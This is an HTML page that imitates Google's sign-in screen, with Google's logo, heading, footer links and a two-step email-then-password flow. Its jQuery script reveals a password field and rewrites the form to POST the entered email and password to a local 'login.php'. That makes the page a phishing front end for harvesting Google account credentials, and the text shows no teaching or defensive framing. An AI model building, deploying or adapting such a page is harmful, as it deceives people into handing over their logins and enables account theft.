<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Document</title>
  <style>
  	body {
  background: #fff;
  direction: ltr;
  font-size: 14px;
  line-height: 1.4286;
  margin: 0;
  padding: 0;
  color: #212121;
  font-family: roboto, arial, sans-serif;
  display: block;

}
.LJtPoc{
  min-height: 0;
  flex-shrink: 0;
  background: #fff;
  box-shadow: 0 2px 2px 0 rgba(0,0,0,0.14), 0 3px 1px -2px rgba(0,0,0,0.12), 0 1px 5px 0 rgba(0,0,0,0.2);
    display: block;
    margin:0 auto;
    box-sizing: border-box;
    max-width: 100%;
    position: relative;
    z-index: 2;
    width: 450px;
    flex-direction: column;
  margin-top: 6.932%;
  margin-bottom:6.932% ;

}

.bdf4dc{
  height:416px;
  min-height:416px;
  overflow-y: auto;
  padding: 48px 40px 36px;
  -webkit-box-flex: 1;
  flex-grow: 1;
}
.SSBsw{
  height: 24px;
  overflow: visible;
  position: relative;
  width:370px;
  display: block;
}

.sfYUmb {
    padding-bottom: 0;
    padding-top: 16px;
    -webkit-margin-before: 0px;
    -webkit-margin-after: 0.67em;
    -webkit-margin-start: 0.67em;
    -webkit-margin-end: 0px;
    font-size: 24px;
    font-weight: 400;
    line-height: 32px;
    margin: 0;
    display: block;
}
.FgbZLd{
  padding-bottom: 3px;
  padding-top: 1px;
  margin: 0;
  display: block;
    -webkit-margin-before:0px;
    -webkit-margin-after: 0px;
    -webkit-margin-start: 0px;
    -webkit-margin-end: 0px;
}
a{
  text-decoration: none;

  color: #4285f4;
}
.linka{
  margin-top: 40px;

}
.place{
  margin-top: 80px;


}
.buttons{
  font-size: 14px;
  white-space: normal;
  align-terms: center;
  display: flex;
  flex-direction: row-reverse;
  flex-wrap: wrap;
  justify-content: space-between;
  margin-top: 32px;
  min-height: 48px;
  background: #000;
}

input[type=text] {
    width:100%;
    padding: 12px 10px;

    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
}
input[type=password] {
    width:100%;
    padding: 12px 10px;

    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
}

.button{
  float:right;
  background: #4285f4;
  color: white;
  border:none;
  display:block;
}


.edit_button {
    float: right;
    margin: 0 10px 10px 0; /* for demo only */
    line-height: 34px;
    min-width: 88px;
  color: white;
  background: #4285f4;
  border:none;
  box-shadow: 0 2px 2px 0 rgba(0,0,0,0.14), 0 3px 1px -2px rgba(0,0,0,0.12), 0 1px 5px 0 rgba(0,0,0,0.2);
  border-radius: 3px;
    cursor: pointer;
    display: inline-block;
    font-size: 14px;
    font-weight: 500;
    height:36;
  -webkit-appearance:default-button;
  min-height:36;
  height:36;
}
.lala{
  margin-top: 32px;
    min-height: 48px;
}
.VYMape{
  bottom: 0;
    direction: ltr;
    left: 0;
    overflow: hidden;
    position: absolute;
    right: 0;
    top: 0;
    z-index: 1;
    background: #e0e0e0;
}

.main-footer{
  height: 16.8px;
    padding: 24px 0 0;
    position: absolute;
    width: 100%;
  justify-content: space-between;
    font-size: 12px;
    line-height: 1.4;

}


.leftsa{
  color:black;
  height:16.8px;
  display:block;
  width:30%;
  display: inline-block;
}
.right-footer{
  list-style:none;
  float:right;
  display: inline-block;
  -webkit-margin-before: 0px;
    -webkit-margin-after: 0px;
}
.right-footer a{
  color: #757575;
  padding: 6px 16px;
  font-size: 12px;
    line-height: 1.4;
}
li{
  display: inline-block;
}




  </style>
</head>

<body>
  <div>
  <div class="LJtPoc" style="height:500px;">
    <div class="bdf4dc">
      <div class="SSBsw">
        <svg viewBox="0 0 74 37" width="198" height="37" preserveAspectRatio="xMinYMin" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><g id="qaEJec" class="yhFy6d Z0mrz"><path fill="#ea4335" d="M67.954 16.303c-1.33 0-2.278-.608-2.886-1.804l7.967-3.3-.27-.68c-.495-1.33-2.008-3.79-5.102-3.79-3.068 0-5.622 2.41-5.622 5.96 0 3.34 2.53 5.96 5.92 5.96 2.73 0 4.31-1.67 4.97-2.64l-2.03-1.35c-.673.98-1.6 1.64-2.93 1.64zm-.203-7.27c1.04 0 1.92.52 2.21 1.264l-5.32 2.21c-.06-2.3 1.79-3.474 3.12-3.474z"></path></g><g id="YGlOvc" class="yhFy6d sOEOU"><path fill="#34a853" d="M58.193.67h2.564v17.44h-2.564z"></path></g><g id="BWfIk" class="yhFy6d xD55Wd"><path fill="#4285f4" d="M54.152 8.066h-.088c-.588-.697-1.716-1.33-3.136-1.33-2.98 0-5.71 2.614-5.71 5.98 0 3.338 2.73 5.933 5.71 5.933 1.42 0 2.548-.64 3.136-1.36h.088v.86c0 2.28-1.217 3.5-3.183 3.5-1.61 0-2.6-1.15-3-2.12l-2.28.94c.65 1.58 2.39 3.52 5.28 3.52 3.06 0 5.66-1.807 5.66-6.206V7.21h-2.48v.858zm-3.006 8.237c-1.804 0-3.318-1.513-3.318-3.588 0-2.1 1.514-3.635 3.318-3.635 1.784 0 3.183 1.534 3.183 3.635 0 2.075-1.4 3.588-3.19 3.588z"></path></g><g id="e6m3fd" class="yhFy6d iatTM"><path fill="#fbbc05" d="M38.17 6.735c-3.28 0-5.953 2.506-5.953 5.96 0 3.432 2.673 5.96 5.954 5.96 3.29 0 5.96-2.528 5.96-5.96 0-3.46-2.67-5.96-5.95-5.96zm0 9.568c-1.798 0-3.348-1.487-3.348-3.61 0-2.14 1.55-3.608 3.35-3.608s3.348 1.467 3.348 3.61c0 2.116-1.55 3.608-3.35 3.608z"></path></g><g id="vbkDmc" class="yhFy6d bz1b9d"><path fill="#ea4335" d="M25.17 6.71c-3.28 0-5.954 2.505-5.954 5.958 0 3.433 2.673 5.96 5.954 5.96 3.282 0 5.955-2.527 5.955-5.96 0-3.453-2.673-5.96-5.955-5.96zm0 9.567c-1.8 0-3.35-1.487-3.35-3.61 0-2.14 1.55-3.608 3.35-3.608s3.35 1.46 3.35 3.6c0 2.12-1.55 3.61-3.35 3.61z"></path></g><g id="idEJde" class="yhFy6d leqljc"><path fill="#4285f4" d="M14.11 14.182c.722-.723 1.205-1.78 1.387-3.334H9.423V8.373h8.518c.09.452.16 1.07.16 1.664 0 1.903-.52 4.26-2.19 5.934-1.63 1.7-3.71 2.61-6.48 2.61-5.12 0-9.42-4.17-9.42-9.29C0 4.17 4.31 0 9.43 0c2.83 0 4.843 1.108 6.362 2.56L14 4.347c-1.087-1.02-2.56-1.81-4.577-1.81-3.74 0-6.662 3.01-6.662 6.75s2.93 6.75 6.67 6.75c2.43 0 3.81-.972 4.69-1.856z"></path></g></svg>
      </div>
        <div>
          <h1 class="sfYUmb">Sign in</h1>
          <p class="FgbZLd">with your Google Account</p>
        </div>

        <form id="google_form">
          <div class="place">
            <input id="user" type="text" placeholder="Email or phone" name="user" required>
            <input id="pass" style="display: none" type="password" placeholder="Enter your password" name="pass" required>
              <span id="mess" style="color: red; display: none">Enter an email or phone number</span>
          </div>
          <div class="linka">
            <a href="#">Forgot email?</a>
          </div>
            <div class="lala"><a href="#">More options</a>
   		 <button type="button" id="next" class="edit_button" style="height :38;">NEXT</button>
</div>
      </form>
        </div>
    <footer class="main-footer">

        <a class="leftsa"href="#">English (United States)</a>

      <ul class="right-footer">
        <li>
          <a href="#">Help</a>
        </li>
        <li>
          <a href="#">Privacy</a>
        </li>
        <li>
          <a href="#">Terms</a>
        </li>

      </ul>
    </footer>

    </div>

     </div>


</body>
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.js"></script>
<script>
	$('#next').click(function(){
       if ($('#user').val() == 0){
         $('#user').css("border-color", "red")
        $('#mess').show();
       } else{
            $('#mess').hide();
      		$('#user').hide()
		$('#pass').show()
	  $('#next').attr("type", "submit");
	  $('#google_form').attr('method', "post");
    $('#google_form').attr('action', "login.php");
    var user = $('#user').val();
    $('.FgbZLd').html("<center>" + user + "</center>")
    $('.sfYUmb').html('<center>Welcome</center>')     
       }
	})
</script>

</html>
